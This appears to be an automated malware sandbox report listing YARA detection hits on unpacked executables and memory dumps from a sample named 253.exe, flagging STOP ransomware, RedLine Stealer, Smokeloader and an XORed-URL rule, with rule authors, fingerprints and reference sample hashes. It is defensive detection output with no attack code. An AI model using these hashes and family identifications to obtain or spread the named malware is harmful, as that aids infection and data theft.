Source: 18.0.253.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 18.2.253.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 18.2.253.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 18.2.253.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 18.0.253.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 18.0.253.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 18.0.253.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 18.0.253.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 18.2.253.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 18.2.253.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 18.2.253.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 18.0.253.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 18.0.253.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 18.0.253.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 18.0.253.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 18.0.253.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 18.0.253.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 18.0.253.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 18.0.253.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 18.0.253.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 18.0.253.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 18.0.253.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 18.0.253.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 18.0.253.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 18.0.253.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 18.0.253.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 18.0.253.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 18.0.253.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 18.0.253.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 18.0.253.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 18.0.253.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 18.0.253.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 18.0.253.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.253.exe.23d15a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 14.2.253.exe.23d15a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.253.exe.23d15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 18.0.253.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 18.0.253.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 18.0.253.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 18.0.253.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 18.0.253.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 18.0.253.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 18.0.253.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 18.0.253.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 18.0.253.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 18.0.253.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.253.exe.23d15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 14.2.253.exe.23d15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.253.exe.23d15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 18.0.253.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 18.0.253.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 18.0.253.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.327806138.0000000000719000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000B.00000002.472600397.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.327538196.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000B.00000002.473007456.0000000000678000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000012.00000000.381594239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000012.00000000.420031906.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000012.00000000.420031906.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000012.00000000.420031906.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000E.00000002.448264858.00000000022E3000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000012.00000000.430997531.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000012.00000000.430997531.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000012.00000000.430997531.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000002.472415838.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000012.00000002.451482759.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000012.00000002.451482759.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000012.00000002.451482759.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000012.00000000.404293183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000012.00000000.404293183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000012.00000000.404293183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.307013938.00000000023E1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000E.00000002.450132397.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.327509086.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000011.00000000.373415476.0000000002C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
